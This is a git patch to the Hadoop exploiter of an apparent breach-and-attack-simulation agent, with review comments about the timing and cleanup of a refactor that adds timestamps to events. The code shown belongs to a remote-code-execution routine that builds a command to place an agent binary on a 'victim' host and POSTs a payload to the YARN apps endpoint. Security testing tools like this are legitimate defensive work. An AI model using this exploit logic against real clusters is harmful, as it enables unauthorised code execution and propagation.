From 76a3cb0ba0670bf8e0cd89c9825d47212b6d44bf Mon Sep 17 00:00:00 2001
From: Kekoa Kaaikala
Date: Wed, 5 Oct 2022 20:16:06 +0000
Subject: [PATCH] Agent: Stamp time before exploit executes
---
 monkey/infection_monkey/exploit/hadoop.py | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 4046a81b1..0a5b986a6 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -9,6 +9,7 @@ import logging
 import posixpath
 import random
 import string
+from time import time
 from typing import Tuple
 import requests
@@ -66,8 +67,9 @@ class HadoopExploiter(WebRCE):
 self.host, str(monkey_path_on_victim), self.agent_binary_repository
 )
+ command = self._build_command(monkey_path_on_victim, http_path)
+ stamp = time()
 try:
- command = self._build_command(monkey_path_on_victim, http_path)
 if self.exploit(self.vulnerable_urls[0], command):
 self.add_executed_cmd(command)
@@ -76,8 +78,8 @@ class HadoopExploiter(WebRCE):
 except requests.RequestException as err:
 error_message = str(err)
- self._publish_exploitation_event(False, error_message=error_message)
- self._publish_propagation_event(False, error_message=error_message)
+ self._publish_exploitation_event(stamp, False, error_message=error_message)
+ self._publish_propagation_event(stamp, False, error_message=error_message)
 finally:
 http_thread.join(self.DOWNLOAD_TIMEOUT)
 http_thread.stop()
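Review bot: Moving `command = self._build_command(monkey_path_on_victim, http_path)` above `try:` takes it out of reach of the `finally:` shown in the next hunk, which is the only visible place where `http_thread` is joined and stopped. If `_build_command` can raise (its body is not part of this diff), the transfer thread that presumably comes from the call ending on the first context line would be left running. Keeping the call as the first statement under `try:` and putting `stamp = time()` on the line after it preserves the cleanup and still stamps before `self.exploit(...)` runs. The enclosing method starts and ends outside this hunk.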
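Review bot: The `stamp` passed to the two publish calls in this `except` branch is the one taken in the caller before `self.exploit(...)`, while `exploit()` in the last hunk takes its own `stamp = time()` right before `requests.post`. A POST that raises `requests.RequestException` is therefore reported with an earlier time than a POST that returns a non-202 status, although both events describe the same request. If these timestamps are meant for lining up agent activity with logs on the target, a single source is easier to trust. One way is to wrap the `requests.post` call in `exploit()` in `try/except requests.RequestException` and publish the failure there with the local `stamp`, assuming nothing else relies on the exception reaching this handler.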
@@ -107,14 +109,15 @@ class HadoopExploiter(WebRCE):
 self._set_interrupted()
 return False
+ stamp = time()
 resp = requests.post(
 posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
 )
 success = resp.status_code == 202
 message = "" if success else f"Failed to exploit via {url}"
- self._publish_exploitation_event(success, error_message=message)
- self._publish_propagation_event(success, error_message=message)
+ self._publish_exploitation_event(stamp, success, error_message=message)
+ self._publish_propagation_event(stamp, success, error_message=message)
 return success
 def check_if_exploitable(self, url):
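Review bot: `stamp = time()` sits in the right place, after the interruption check and immediately before `requests.post`, but nothing records why, and the name says little next to `from time import time`. A comment such as `# Event time is taken before the POST so it marks when the request was sent, not when the response or timeout came back` would stop a later refactor from moving it below the call, where it could drift by up to `LONG_REQUEST_TIMEOUT`. Renaming the local to `timestamp` would also help. The new leading argument to `_publish_exploitation_event` and `_publish_propagation_event` is a float placed next to a bool, so a missed call site would not fail on type; passing it by keyword, if those helpers (defined outside this diff) accept that, would make such a mistake visible. `exploit` begins above this hunk.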